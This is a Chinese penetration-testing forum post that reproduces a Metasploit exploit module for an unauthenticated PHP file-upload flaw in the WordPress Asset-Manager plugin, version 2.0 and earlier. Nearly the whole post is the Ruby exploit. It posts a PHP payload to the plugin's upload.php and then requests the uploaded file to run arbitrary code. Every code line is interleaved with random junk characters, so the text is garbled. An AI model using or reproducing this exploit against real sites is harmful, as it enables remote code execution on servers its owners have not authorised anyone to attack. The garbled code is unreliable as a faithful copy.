找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1868|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
2 E: h" e3 e5 f3 A4 \" Q4 g; Z0 z& }5 E. M* s5 t' w
##
, T5 Y) @2 J! v% Y8 j  f# This file is part of the Metasploit Framework and may be subject to
5 s/ T2 ^- Z# r- ~2 ^* y7 U" N$ ?8 c# redistribution and commercial restrictions. Please see the Metasploit
! e4 N- D3 B9 S; d, b! {5 m# Framework web site for more information on licensing and terms of use.+ ?. f' I  f% K. v- ]4 G
#   http://metasploit.com/framework/$ u" W/ P& w* s1 d7 C: e# C
##' [; s/ ]! P  w( S
. a3 l. Q5 ~' h
require 'msf/core'
+ L  [  h5 q2 M8 b5 `% I& {* qrequire 'msf/core/exploit/php_exe'+ n! s4 _+ u+ i" `0 @

% Z& C$ ~  c. B" C2 Nclass Metasploit3 < Msf::Exploit::Remote; y9 p( x+ @7 F' H6 y$ _6 [
  Rank = ExcellentRanking
8 P; B9 \8 m' O; `2 c* I5 s! \  m
7 I7 L0 @/ |% \' S6 Y  X  include Msf::Exploit::Remote::HttpClient
# {; g7 q& L, ^0 m1 s$ j  include Msf::Exploit:hpEXE
; {! f9 @, Z( {
3 g8 c5 J  r* }* a2 C  def initialize(info = {})
0 J4 ^9 D$ O! D7 Q    super(update_info(info,
* c/ a. j" k" [/ R. X      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
( ^& c' c2 D5 }( r. V, d# _      'Description'    => %q{
7 \/ R, e8 o1 I& i% B. {        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress/ M' y0 o. S* j7 n2 Z3 V3 y
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
% m( n$ {  V" q        temp directory without authentication, which results in arbitrary code execution.4 G# ]- h% i/ T, o! h
      },
& e- M' E" b3 z9 c! Y& l" N      'Author'         =>
. x4 P- r# x* G9 h, {        [+ L! I& w) y* ^( g/ O6 C
          'Sammy FORGIT', # initial discovery) P/ {- S3 s) ?0 @1 z
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module% u9 E6 N  {% [3 {! i8 U
        ],( L: a$ j; K' k
      'License'        => MSF_LICENSE,
# ^: @( z7 K9 [5 n      'References'     =>
) @8 K! ], D0 s! b- l2 u        [$ H8 Q% \) r+ C7 U, U5 Q1 n$ h3 q
          [ 'OSVDB', '82653' ],
! E8 r% z4 L& K0 k; S  S) I- A4 h6 b          [ 'BID', '53809' ],5 L. V& t! s+ \/ ~- Y4 Y
          [ 'EDB', '18993' ],( j; Y; m* K+ z9 }9 t. A/ ^
          [ 'URL', 'http:// www.myhack58.com /' ]
8 |; P. j( F: H/ ~/ x' q" x        ],
2 ?! I- v$ S( g6 \+ ^, Z3 W      'Payload'       =>
0 ?5 r6 s6 L% P8 X2 V        {
- d6 s% v: p. H2 [! M          'BadChars' => "\x00",0 u2 G# J% h" d' Z
        },# Z, D# ~' [9 L. C
      'Platform'       => 'php',6 |+ T7 k2 C) P2 p. E
      'Arch'           => ARCH_PHP,0 b" R; F) w, `" \$ U2 V. D
      'Targets'        =>  }/ p9 {: f' V9 J
        [) H8 N- D0 h  L
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],+ K: E6 V& g8 k- S+ W4 u
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]2 \: o2 J3 t; F6 z
        ],
# g6 U% C. m% W6 x0 ?' N* q1 l      'DefaultTarget' => 0,! D- Y% d& S& G- R% K
      'DisclosureDate' => 'May 26 2012'))6 Y5 Z( D" a7 c" F) o+ G9 @
% L- o1 F0 @: F+ k$ b
    register_options(
  L1 R- l( A% r" Z% Z8 v5 O      [  k1 e: S9 e% h9 o; f' X
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
* P3 Z7 I3 R% {( M& w6 K$ |8 `      ], self.class)& [& v( y) W: `7 k5 ?* r; g5 Q
  end
+ r' O5 m* k# o$ ~5 d" y+ t* `7 o 3 v7 p4 u' p3 C5 t5 P* ~
  def exploit
+ ^* D7 u3 U( r) m1 l% R+ X    uri =  target_uri.path
" Q% R# R3 T; N2 x8 n) R/ r    uri << '/' if uri[-1,1] != '/'
; T3 F6 ?2 o8 S$ P' r1 Y: N    peer = "#{rhost}:#{rport}", l( C5 j/ a/ Z; \/ Y$ l5 S
    payload_name = "#{rand_text_alpha(5)}.php"$ |& B% c) K9 E  D/ E1 b: K
    php_payload = get_write_exec_payload(:unlink_self=>true)
6 ^8 G" f0 u% d& e , }$ b2 M  R( ~; Y3 k( D: ]4 p* p& O
    data = Rex::MIME::Message.new1 R7 \) f% O( O; h9 q7 f' j% o
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")7 `+ G- v/ A3 a  g! |
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
6 w0 ?$ i, }+ y + D3 w5 p7 h  B0 o% j
    print_status("#{peer} - Uploading payload #{payload_name}")
1 e, |, A$ K# A    res = send_request_cgi({
4 v( S! _' w/ n, h  f      'method'  => 'POST',8 {  t! i) @  m8 ^% I  L
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
) |0 ]1 B0 M* s2 n& T7 B" n      'ctype'   => "multipart/form-data; boundary=#{data.bound}"," {1 c5 k% D1 Q
      'data'    => post_data2 i) c0 @3 w* F; |+ `3 d
    })
1 }+ x, t- V& A 5 ~8 ~% l4 D: B
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
$ W, X+ \# s0 n9 G9 h$ T2 j      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")4 Z7 v' V2 X' @* g3 v- o; R+ a
end
: \8 d9 |3 `0 J7 H# A; c
4 X9 G, [$ l& |; c    print_status("#{peer} - Executing payload #{payload_name}")8 b3 Q$ n7 z- G" M# D! G
    res = send_request_raw({8 [( G0 ]  y  ?. [. ~5 o
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",! S8 o: O4 _  S
      'method'  => 'GET'
0 C) U) M( j0 j- y' {( U/ u    })
9 X8 r, D# w& C+ { 5 J: k7 a- r" ?4 }( w
    if res and res.code != 200
# `8 q1 }" [& K9 L$ c' G      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
( O& \. g% \8 g; A    end
6 o- H* g, X* T# T  end
+ B- x% f  H/ aend: L9 L8 ^9 g5 X, n+ x! a3 w
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表